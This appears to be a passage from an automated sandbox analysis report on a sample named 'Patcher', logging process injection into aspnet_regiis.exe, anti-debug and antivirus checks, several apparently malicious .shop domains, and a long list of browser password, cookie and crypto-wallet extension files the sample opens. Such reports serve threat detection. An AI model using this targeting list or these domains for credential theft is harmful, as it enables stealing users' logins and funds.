                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1768289375.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C80BE0 LdrInitializeThunk,2_2_72C80BE0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE794A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDE794A
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDED6EB GetProcessHeap,0_2_6CDED6EB
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE7471 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDE7471
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE794A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDE794A
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDEB917 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDEB917
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000 value starts with: 4D5AJump to behavior
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: wholersorie.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: framekgirus.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: nearycrepso.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: abruptyopsn.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: cureprouderio.click
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: rabidcowse.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: cloudewahsj.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: tirepublicerj.shop
                Source: Patcher_I5cxa9AN.exeString found in binary or memory: noisycuttej.shop
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C41000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C85000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C88000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C96000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C41000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C85000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C88000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C96000Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2B1D008Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE7B18 cpuid 0_2_6CDE7B18
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeQueries volume information: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDE7593 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDE7593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                Source: aspnet_regiis.exe, 00000002.00000002.1770596085.00000000053B3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729802016.00000000053B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
